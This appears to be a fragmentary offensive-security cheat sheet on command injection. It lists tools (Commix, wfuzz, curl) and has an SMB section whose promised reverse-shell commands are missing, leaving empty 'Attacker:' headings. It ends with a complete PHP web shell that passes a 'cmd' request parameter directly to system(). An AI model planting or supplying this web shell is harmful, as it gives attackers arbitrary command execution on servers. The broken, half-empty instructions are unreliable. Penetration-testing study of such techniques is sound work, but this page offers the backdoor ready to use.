Below is a list of common tools and methods to test for command injection.

Commix

wfuzz

curl

 

SMB

Following could be used to achieve command execution and pop a reverse shell via poorly configured SMB.

Get command execution.

Attacker:

smbmap and smbclient also has switches for command execution over SMB.

PHP

 

<?php

$cmd=$_GET[‘cmd’];

system($cmd);

?>

Command Injection – Tools and methods
Tagged on: